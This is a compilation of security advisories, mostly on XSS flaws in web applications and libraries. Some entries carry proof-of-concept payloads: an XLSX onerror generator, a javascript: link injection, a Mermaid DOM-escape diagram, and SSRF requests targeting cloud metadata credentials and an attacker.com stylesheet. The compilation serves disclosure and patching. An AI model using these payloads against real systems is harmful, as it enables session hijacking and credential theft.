Motopress Hotel Booking Lite 4.2.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting payloads in accommodation type. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin Testimonial Slider and Showcase 2.2.6 contains a stored cross-site scripting vulnerability that allows authenticated editors to inject malicious scripts by failing to sanitize the. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin Netroics Blog Posts Grid 1.0 contains a stored cross-site scripting vulnerability that allows authenticated editors to inject malicious scripts by failing to sanitize the post_title. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress 3dady real-time web stats plugin 1.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by exploiting unsanitized input. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Moodle LMS 4.0 contains a cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting payloads through the search parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Cross-site scripting (XSS) in Devs Palace ERP Online through version 4.0.0 allows high-privileged authenticated users to inject malicious scripts via the /inventory/item-save endpoint, requiring user interaction (UI:P) for exploitation. Public exploit code is available, and the vendor has not responded to early disclosure notification, leaving affected deployments without an official patch and at risk of account compromise or session hijacking by attackers with high administrative privileges.
Reflected cross-site scripting in Devs Palace ERP Online up to version 4.0.0 allows authenticated high-privilege users to inject malicious scripts via the /inventory/customer-save endpoint, requiring user interaction to execute. Despite public exploit availability and early vendor notification, no patch or vendor response has been documented. CVSS score of 1.9 reflects high authentication requirements and limited impact scope, though the presence of public exploit code indicates practical demonstration of the vulnerability.
Stored cross-site scripting (XSS) in Devs Palace ERP Online up to version 4.0.0 allows high-privileged authenticated users to inject malicious scripts via the /inventory/supplier-save endpoint, affecting data integrity and confidentiality of other users viewing the supplier data. The vulnerability requires user interaction (UI:P) and high-level privileges (PR:H), limiting its exploitation scope; however, publicly available exploit code exists and the vendor has not responded to disclosure.
Cross-site scripting (XSS) vulnerability in Devs Palace ERP Online up to version 4.0.0 allows authenticated high-privilege users to inject malicious scripts via the /inventory/purchase_return_save endpoint. The vulnerability requires user interaction (UI:P) to trigger, and publicly available exploit code exists. The vendor has not responded to disclosure attempts, leaving affected installations without official guidance or patches.
Stored cross-site scripting (XSS) in JeecgBoot up to version 3.9.1 allows remote attackers to inject malicious scripts via SVG file handling in the CommonController component, requiring user interaction to trigger payload execution. The vulnerability has publicly available exploit code and affects the system's integrity through stored script injection, with a CVSS score of 2.1 reflecting low severity due to user interaction requirement and limited impact scope.
Cross-site scripting (XSS) in mistune's HTMLRenderer.heading() allows injection of arbitrary HTML attributes when custom heading_id callbacks return unsanitized heading text. The vulnerability occurs because the id attribute value is concatenated directly into the HTML tag without escaping, enabling attackers who control heading content to break out of the id= attribute and inject event handlers or other malicious attributes. Exploitation requires a caller-supplied heading_id callback that derives IDs from heading text - the most common real-world pattern used by documentation generators like MkDocs, Sphinx, and Jekyll. Publicly available proof-of-concept demonstrates mouse-over triggered JavaScript execution via onmouseover attribute injection.
Cross-site scripting (XSS) via unescaped HTML attributes in mistune's figure directive allows attackers to inject arbitrary HTML and JavaScript when processing markdown documents with figure directives, bypassing the HTMLRenderer escape setting. The `figclass` and `figwidth` parameters in `render_figure()` are concatenated directly into HTML without sanitization, while other attributes in the same file are properly escaped. Vulnerability affects mistune versions through 3.2.0; no patched version is currently released.
Cross-site scripting (XSS) vulnerability in the Mistune markdown parser's math plugin bypasses the `escape=True` security setting by rendering inline (`$...$`) and block (`$$...$$`) math content without HTML escaping. Attackers can inject arbitrary JavaScript that executes in the victim's browser session when a developer-controlled application parses untrusted markdown with the math plugin enabled, even when the parser is explicitly configured to sanitize all user input. Proof-of-concept code demonstrates script tag injection and image onerror handler exploitation; no public exploit code identified at time of analysis.
Stored cross-site scripting in Linkwarden 2.14.0 and earlier allows remote unauthenticated attackers to execute arbitrary JavaScript in victims' authenticated sessions by uploading malicious HTML archives. The vulnerability exists because the /api/v1/archives endpoint accepts unsanitized HTML files and serves them without Content-Security-Policy protections, enabling session hijacking and account takeover. No vendor-released patch identified at time of analysis (GHSA advisory notes no patches available). EPSS data not provided; no active exploitation (CISA KEV) or public POC identified at time of analysis.
Grimmory is a self-hosted digital library. Prior to version 2.3.1, a stored cross-site scripting (XSS) vulnerability in Grimmory's browser-based EPUB reader allows an attacker to embed arbitrary JavaScript in a crafted EPUB file. When a victim opens the book, the script executes in their browser with full access to the Grimmory application's session context. This can enable session token theft and account takeover, including administrative access if an administrator opens the affected book. This issue has been patched in version 2.3.1.
Postiz is an AI social media scheduling tool. From version 2.21.6 to before version 2.21.7, any authenticated user who can create a post can store arbitrary HTML in post content by tampering their own save request and send the public preview link /p/<postId>?share=true to another user. The preview page renders that stored HTML with dangerouslySetInnerHTML on the main application origin. This issue has been patched in version 2.21.7.
### Summary Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the [sheetjs](https://git.sheetjs.com/sheetjs/sheetjs) function [sheet_to_html](https://git.sheetjs.com/sheetjs/sheetjs/src/commit/66cf8d2117d271f89e4f47b5fed35a3e1ea93f67/bits/79_html.js#L127) to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via [`@html`](https://svelte.dev/docs/svelte/@html) causing the payload to trigger. ### Details The function used to convert XLSX documents to HTML for preview does not perform any input validation or sanitisation for the generated HTML https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L120-L133 XLSX attachments are processed by this function, converted to HTML with `XLSX.utils.sheet_to_html` before ultimately being assigned to the variable `excelHtml`. Later there is logic that causes this to be assigned directly to the DOM when the preview tab is selected. https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L358-L400 ### PoC A python script to generate a payload file is as follows: ```python import xlsxwriter payload = '<img src=x onerror="alert(\'XSS Triggered by XLSX file\')">' workbook = xlsxwriter.Workbook('xss_payload.xlsx') worksheet = workbook.add_worksheet() payload_format = workbook.add_format() worksheet.write_rich_string('A1', 'This cell contains a hidden payload: ', payload_format, payload ) worksheet.write('A2', 'This is a safe cell.') worksheet.write('B1', 'Column B') workbook.close() ``` Upload the generated file as an attachment to a chat, open the file modal, and click preview. Observe the XSS triggers. <img width="2444" height="1386" alt="image" src="https://github.com/user-attachments/assets/8400efb0-ea6f-4878-abdb-4c2fe529241f" /> This same process can be triggered in shared chats, allowing the payload to be distributed to victims. <img width="2386" height="1646" alt="image" src="https://github.com/user-attachments/assets/d0eda49c-8fcf-4fc4-bbb0-c8951b0369c3" /> ### Impact Any user can create a weaponised chat that can be shared and subsequently used to target other users. Low privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server. Admins are at risk of exposing the server to RCE via same chain described in GHSA-w7xj-8fx7-wfch. ### Caveats The file attachment in the shared chat must be opened and previewed to trigger the vulnerability. ### Recommendation Sanitise the generated HTML with DOMPurify before assigning it to the DOM.
### Impact Users with component view access could be impacted by an unescaped `notes` column. ### Patches This was patched in https://github.com/grokability/snipe-it/commit/28f493d84d057895fbb93b6570e7393a2c2fa438, and is fixed in v8.4.1 or greater. ### Workarounds None.
## Vulnerability Details **CWE-79**: Cross-site Scripting (XSS) The `AccountPending.svelte` component renders the admin-configured "Pending User Overlay Content" using `marked.parse()` inside `{@html}` with an incorrect DOMPurify application order: ### Vulnerable Code **`src/lib/components/layout/Overlay/AccountPending.svelte` (lines 43-48)**: ```svelte {@html marked.parse( DOMPurify.sanitize( ($config?.ui?.pending_user_overlay_content ?? '').replace(/\n/g, '<br>') ) )} ``` DOMPurify is applied to the raw Markdown input **before** `marked.parse()` processes it. This is the wrong order. DOMPurify sanitizes the Markdown text (which contains no HTML tags), then `marked.parse()` converts Markdown link syntax into HTML `<a>` tags with `javascript:` href, and the result is rendered with `{@html}` unsanitized. The correct pattern (used elsewhere in the codebase, e.g., `NotebookView.svelte:77`) is: ```javascript DOMPurify.sanitize(marked.parse(src)) // sanitize AFTER markdown parsing ``` ## Steps to Reproduce ### Prerequisites - Open WebUI v0.8.10 - Admin account - A second user account with "pending" role ### Steps 1. Log in as admin and navigate to **Admin Settings** → **Settings** → **General**. 2. Set **Default User Role** to `pending`. 3. In the **Pending User Overlay Content** field, enter: ``` # Account Pending Your account is under review. [Contact Support](javascript:alert(document.domain)) ``` 4. Save the settings. 5. In a separate browser (or incognito window), create a new account or log in as a pending user. 6. The pending overlay is displayed. Click the "Contact Support" link. 7. A JavaScript alert dialog appears showing `localhost` (the document domain), confirming XSS execution. ### Verified Output The `alert(document.domain)` executes successfully, displaying "localhost" in a JavaScript dialog box. ## Impact An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This could be used to: - **Session hijacking**: Steal pending users' JWT tokens from cookies/localStorage - **Credential theft**: Replace the pending overlay with a fake login form - **Phishing**: Redirect pending users to malicious sites While this requires admin privileges to set the overlay content, it enables an admin to attack pending users (who have not yet been granted full access). In multi-admin deployments, a compromised admin account could use this to escalate attacks. ## Proposed Fix Apply DOMPurify **after** `marked.parse()`, not before: ```svelte <!-- Before (vulnerable): --> {@html marked.parse( DOMPurify.sanitize( ($config?.ui?.pending_user_overlay_content ?? '').replace(/\n/g, '<br>') ) )} <!-- After (fixed): --> {@html DOMPurify.sanitize( marked.parse( ($config?.ui?.pending_user_overlay_content ?? '').replace(/\n/g, '<br>'), { async: false } ) )} ``` <img width="1510" height="1093" alt="2026-03-23_03-07" src="https://github.com/user-attachments/assets/bcc94dd6-4f06-472b-9979-9759458c76b3" />
## Summary `PDFService._markdown_to_html()` constructs an HTML document by interpolating user-controlled values - specifically `title` (sourced from `research.title` or `research.query`) and `metadata` key-value pairs - directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in `ssrf_validator.py`. --- ## Details **Vulnerable code:** `src/local_deep_research/web/services/pdf_service.py`, lines 171-176 ```python # pdf_service.py:171-176 if title: html_parts.append(f"<title>{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- ## Proof of Concept **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- ## Impact ### 1. Chained SSRF (High Severity) By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure - enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) - enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** - if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. ### 2. HTML Document Structure Corruption Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. ### 3. CSS Injection (Medium Severity) By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. ### 4. Affected Scope - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user - no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- ## Remediation Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` - local-deep-research, branch `main`.* --- ## Maintainer note (2026-04-24) Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) - closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) - implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML - markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** - upgrade to v1.6.0 or later to receive both fixes.
Lack of validation of filter_target parameter on return_dynamic_filters.php (normally used as an AJAX in View Issues Page) allows an attacker to inject arbitrary HTML if the target is a TEXTAREA custom field. ### Impact Cross-site scripting (XSS) ### Patches - c885af13f0b8596714ffe11df757c09f35fbd8f4 ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.
### Impact Under the default configuration, Mermaid state diagram's `classDef` allow DOM injection that escapes the SVG, although `<script>` tags are removed, preventing XSS. #### Proof-of-concept ``` stateDiagram-v2 classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b [*] --> A:::xss ``` ### Patches - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)) ### Workarounds If you can not update to a patched version, setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ### Credits Thanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.
Incorrect escaping of a saved filter's owner allows an attacker to inject arbitrary HTML on systems where $g_show_user_realname = ON. ### Impact Cross-site scripting (XSS). Note that By default, only users with *Manager* access level or above can save their filters publicly ### Patches - 44f490bcf20fd491c1b8f3fc9dd041d8c2a30010 ### Workarounds - Prevent display of users' real name (set `$g_ show_user_realname = OFF;` in configuration) - Restrict ability to store filters (set $`g_stored_query_create_threshold` / $`g_stored_query_create_shared_threshold` to `NOBODY` ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.
Improper escaping of the redirection page (retrieved from the request's *Referer* header) allows an attacker to inject HTML. While this is generally not directly actionable as modern browsers will URL-encode special characters, on some specific server configurations this could poison the cache, leading to cross-site scripting. ### Impact Cross-site scripting (XSS). ### Patches - b1ebc57763f104eb5f541b7b4d1ce6948168abd9 ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.
Given any pre-existing XSS / HTML injection vulnerability, an attacker can bypass the Content Security Policy's _script-src_ directive by uploading a crafted attachment to any issue that, when accessed via the _file_download.php_ link, will be downloaded with a valid JavaScript MIME type resulting in script execution. The uploaded payload must be sniffed as a valid JavaScript MIME type by PHP finfo (see file_create_finfo() API function). Non-JavaScript MIME types will not get imported in a `<script>` tag by the browser, due to response header X-Content-Type-Options being set to _nosniff_, which requires all imported JavaScript files to be a valid JavaScript MIME type. ### Impact Cross-site scripting ### Patches - 9e3bee2e7b909f4e3596985892b8bc8bee9e0bfe ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.
Any authenticated user can inject arbitrary HTML via updating their account's font family. ### Impact Cross-site scripting. The injected payload will be reflected in every MantisBT page. Leveraging another vulnerability (CSP bypass, see [GHSA-9c3j-xm6v-j7j3](https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3)), the attacker could achieve account takeover. ### Patches - 9e8409cdd979eba86ef532756fc47c1d8112d22d ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.
Improper escaping of a textarea custom field's contents in the Update Issue page (bug_update_page.php) allows an attacker to inject HTML and, if CSP settings permit, execute arbitrary JavaScript when the page is loaded. ### Impact Session theft leading to admin account takeover, full project data access. - Precondition: A textarea-type custom field must be configured for the project - Attacker: Authenticated user with bug report permission (low privilege) - Victim: Any user viewing the bug edit form, including administrators ### Patches - 5fec0f448b7a7d7d539a6adb6dccceac4e4e4ab7 ### Workarounds The default Content-Security Policy will block script execution. ### References - https://mantisbt.org/bugs/view.php?id=37003 - This is related to [CVE-2024-34081](https://github.com/advisories/GHSA-wgx7-jp56-65mq). ### Credits Thanks to the following security researchers for independently discovering and responsibly reporting the issue, and providing a patch to fix it. - Thanks to Nozomu Sasaki (Paul) (@morimori-dev) - Tristan Madani (@TristanInSec) from Talence Security
Stored HTML injection and cross-site scripting in MantisBT versions 2.28.1 and earlier allows a privileged user (manager or administrator) to inject HTML through a Project's name field, which is later rendered unescaped on the issue clone form (bug_report_page.php) when cloning issues across projects. The flaw is mitigated by MantisBT's default Content Security Policy, which blocks inline script execution, and no public exploit identified at time of analysis. The CVSS 4.0 score of 8.6 reflects high confidentiality, integrity, and availability impacts on the vulnerable component despite requiring high privileges.
Stored Cross-Site Scripting in WeGIA versions prior to 3.7.3 allows authenticated high-privilege users to inject malicious JavaScript into the Processo de Aceitação page that executes when any user accesses the vulnerable endpoint, enabling session hijacking and account takeover. The vulnerability is confined to high-privilege authenticated access (PR:H) with no user interaction required on the victim side, though scope is changed (S:C) indicating cross-context impact. No public exploit code or active exploitation has been identified.
Stored cross-site scripting (XSS) in WeGIA versions prior to 3.7.3 allows authenticated high-privilege users to inject malicious JavaScript into the Etapas de um Processo page, which executes when other users access the page, enabling session hijacking and account takeover. The vulnerability requires high-privilege authentication (PR:H) but affects all users who subsequently visit the injected page, with no public exploit identified at time of analysis.
Reflected cross-site scripting (XSS) in WeGIA versions before 3.7.0 allows unauthenticated remote attackers to inject arbitrary JavaScript via the id_processo parameter in lista_arquivos_etapa.php, enabling session hijacking, credential theft, or malicious actions in victim browsers. User interaction (clicking a crafted link) is required. The vulnerability is fixed in version 3.7.0.
WeGIA is a web manager for charitable institutions. In versions prior to 3.7.0, a Stored Cross-Site Scripting (XSS) flaw was identified at the following endpoint: funcionario/profile_funcionario.php?id_funcionario=2. By injecting a malicious payload into the 'Description' (Descrição) field and saving the profile, the script becomes persistently stored. The payload is subsequently executed whenever the profile page is accessed. This vulnerability is fixed in 3.7.0.
Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in ninenines cowlib allows SSE event splitting and injection via unvalidated field values. cow_sse:event/1 in cowlib guards the id and event fields against \n but not against bare \r, and the internal prefix_lines/2 function used for data and comment fields splits only on \n. Because the SSE specification requires decoders to treat \r\n, \r, and \n as equivalent line terminators, an attacker who controls any of these fields can inject additional SSE lines and forge a complete event with an arbitrary event type and data payload on the receiving end. In typical deployments where browser EventSource clients or other SSE consumers dispatch on event.type and render event.data, this enables event splitting, client-side logic manipulation, and stored-XSS-equivalent behaviour when event data is inserted into the DOM. This issue affects cowlib from 2.6.0.
Stored cross-site scripting (XSS) via CSS injection in Open edX Platform allows enrolled students to inject arbitrary CSS into discussion notification emails sent to other users by bypassing insufficient HTML sanitization in the clean_thread_html_body() function. The vulnerability affects all versions prior to the fix commit and enables email tracking through malicious stylesheets, content spoofing, and phishing attacks against recipients who view notification emails.
Stored cross-site scripting (XSS) in Sonatype Nexus Repository 3.6.0 through 3.91.x allows authenticated users with upload permissions to inject malicious JavaScript into repository content, which executes in the browsers of any user viewing the affected repository directory via the HTML index page. An attacker can perform unauthorized actions within a victim's session context, including potential data theft or privilege escalation depending on the victim's role. The vulnerability requires user interaction (clicking/viewing the malicious content) and prior repository upload access, limiting but not eliminating real-world risk in multi-tenant or open-source repository environments.
Taiga Front prior to version 6.9.1 contains a stored cross-site scripting (XSS) vulnerability that allows authenticated users with limited privileges to inject malicious scripts into confirmation messages and dialogs. When other users view these messages, the scripts execute in their browser context, potentially allowing attackers to steal session cookies, perform unauthorized actions, or redirect victims to malicious sites. The vulnerability requires user interaction (UI:R) but affects confidentiality with a CVSS score of 5.7.
Cross-site scripting via CSP nonce poisoning in Next.js App Router allows attackers to inject malicious scripts into cached HTML responses when applications process untrusted CSP request headers. Versions 13.4.0-15.5.15 and 16.0.0-16.2.4 are vulnerable; attackers can craft malformed nonce values that escape sanitization and execute arbitrary JavaScript for subsequent cache visitors. No public exploit code identified at time of analysis, but the attack requires no authentication and low user interaction (cache hit by victim), making it practically exploitable in shared hosting and CDN scenarios.
Cross-site scripting in Next.js beforeInteractive scripts allows remote unauthenticated attackers to execute arbitrary JavaScript in visitor browsers when applications pass untrusted content to beforeInteractive script features. The vulnerability arises from insufficient HTML escaping of serialized script content before embedding into the document, enabling attackers to break out of the script context. Affected versions include 13.0.0 through 15.5.15 and 16.0.0 through 16.2.4; patched versions 15.5.16 and 16.2.5 are available. No public exploit code or active exploitation has been identified at time of analysis, though the CVSS score of 6.1 reflects moderate risk with required user interaction.
Cross-site scripting (XSS) vulnerability in Wikimedia Scribunto 1.45.0 through 1.45.1 allows authenticated users to inject malicious scripts that may be executed in the context of other users' browsers, potentially compromising session security and enabling unauthorized actions on affected wiki installations. The vulnerability requires login credentials and elevated attack complexity but carries low availability impact; CVSS 2.3 reflects limited real-world threat when combined with the authentication requirement.
Stored cross-site scripting (XSS) in pgAdmin 4 before version 9.15 allows authenticated administrators to execute arbitrary JavaScript in the browsers of other pgAdmin users by crafting malicious PostgreSQL object names (databases, schemas, tables, columns) that are rendered unsafely via innerHTML in the Browser Tree and Explain Visualizer modules. The vulnerability requires administrator privileges and user interaction (navigation to or EXPLAIN execution over the malicious object), limiting real-world exploitation scope despite the network attack vector.
Reflected cross-site scripting (XSS) in Cradle eCommerce platform allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers via crafted input to the /product/ endpoint. The vulnerability requires user interaction (clicking a malicious link) and affects the latest demo version. A vendor patch is available.
Reflected XSS in Cradle eCommerce platform allows unauthenticated remote attackers to execute arbitrary JavaScript in user browsers via unsanitized input reflected in the /collection/ endpoint. The vulnerability requires user interaction (clicking a malicious link) but affects the latest demo version with CVSS 5.1 (low-medium severity). No public exploit code or active exploitation has been identified at time of analysis, though a vendor patch is available.
Reflected XSS in ATutor's /install/install.php endpoint allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by crafting a malicious URL. Version 2.2.4 is confirmed vulnerable; the product is no longer actively maintained and vendor response to disclosure was unsuccessful, leaving no official patch available.
Reflected XSS in ATutor's /install/upgrade.php endpoint allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via a specially crafted URL. The vulnerability affects at least version 2.2.4 and potentially other versions; the product is no longer actively maintained and vendors did not respond with details about the full vulnerable version range. While CVSS 5.1 indicates low severity, the attack requires user interaction (clicking a malicious link) and has limited scope impact.
Cross-site scripting (XSS) in Devs Palace ERP Online version 4.0.0 and earlier allows authenticated high-privilege users to inject malicious scripts via the /accounts/chart-save endpoint. The vulnerability requires user interaction (UI:P) to trigger and results in limited integrity impact. Publicly available exploit code exists, though the CVSS 4.0 score of 1.9 reflects low severity due to the high privilege requirement (PR:H) and user interaction dependency.
Cross-site scripting (XSS) in Devs Palace ERP Online up to version 4.0.0 allows high-privileged authenticated users to inject malicious scripts via the /inventory/sales_save endpoint with user interaction, resulting in integrity impact. The exploit code has been publicly released and the vendor has not responded to early disclosure attempts, leaving affected deployments without vendor-provided patches.
Reflected cross-site scripting (XSS) in Devs Palace ERP Online up to version 4.0.0 allows high-privileged authenticated users to inject malicious scripts via the /accounts/mr-save endpoint, enabling session hijacking or credential theft with user interaction. Exploit code is publicly available and the vendor has not responded to disclosure efforts, leaving affected deployments without an official patch.
Cross-site scripting (XSS) vulnerability in Devs Palace ERP Online versions up to 4.0.0 allows authenticated users with high privileges to inject malicious scripts via the /inventory/add_new_customer endpoint. The vulnerability requires user interaction (UI:P) and has publicly available exploit code, but real-world impact is significantly limited by the requirement for authenticated high-privilege access and user interaction, resulting in a CVSS score of only 1.9 despite network accessibility.
Reflected cross-site scripting (XSS) in docuForm v11.11c allows unauthenticated remote attackers to execute arbitrary JavaScript in a user's browser by crafting a malicious URL containing a payload injected into an unfiltered variable in the dfm-menu_coveragealerts.php component. Successful exploitation requires user interaction (clicking a malicious link) and can lead to session hijacking, credential theft, or malware delivery. CVSS 6.1 reflects moderate impact with low attack complexity; no public patch version has been identified.
Reflected cross-site scripting (XSS) in GmbH Mercury Managed Print Services docuForm v11.11c allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting a malicious payload into an unfiltered variable in the dfm-menu_departments.php component. The vulnerability requires user interaction (clicking a crafted link) and affects confidentiality and integrity with limited scope. No public exploit code has been independently confirmed at this time, though the detailed nature of the component reference suggests proof-of-concept research exists.
Reflected cross-site scripting in Mercury docuForm v11.11c allows authenticated attackers to execute arbitrary JavaScript in victim browsers via crafted payloads to dfm-menu_alerts.php. Attack requires low complexity and user interaction (CVSS:3.1/AV:N/AC:L/PR:L/UI:R). Public proof-of-concept exists on GitHub (ZeroBreach-GmbH gist), but no CISA KEV listing indicates targeted or low-volume exploitation. EPSS data not available, but the authentication requirement and user interaction dependency reduce attack surface compared to stored XSS.
Reflected XSS in docuForm v11.11c acc-menu_billings.php component allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious payloads into unfiltered variables, requiring user interaction to click a crafted link. CVSS 6.1 reflects limited confidentiality and integrity impact with required user interaction, but successful exploitation can lead to session hijacking, credential theft, or account takeover depending on application context.
